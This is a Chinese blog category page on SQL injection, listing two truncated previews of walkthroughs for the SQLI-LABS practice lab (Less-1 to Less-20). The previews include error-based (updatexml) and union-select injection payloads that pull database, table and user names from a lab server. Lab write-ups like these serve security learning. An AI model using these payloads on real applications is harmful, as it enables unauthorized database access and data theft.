![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql注入
文章平均质量分 79
影子019
这个作者很懒,什么都没留下…
展开
-
SQLI-LABS Page1 11-20
0x0B Less-11 报错注入,只是注入方式为POST,可以直接使用报错函数进行注入,也可以使用常规方法 报错注入,之后更改注入语句即可 uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from inform原创 2020-12-27 16:52:00 · 276 阅读 · 0 评论 -
SQLI-LABS Page1 1-10
0x01 Less-1 字符报错注入 简单报错注入,分号检测 payload: http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数,字段为3 http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+ 查看用户:sqli@localhost http://192.168.44.139/sqli-labs/Less-原创 2020-12-14 11:17:26 · 337 阅读 · 0 评论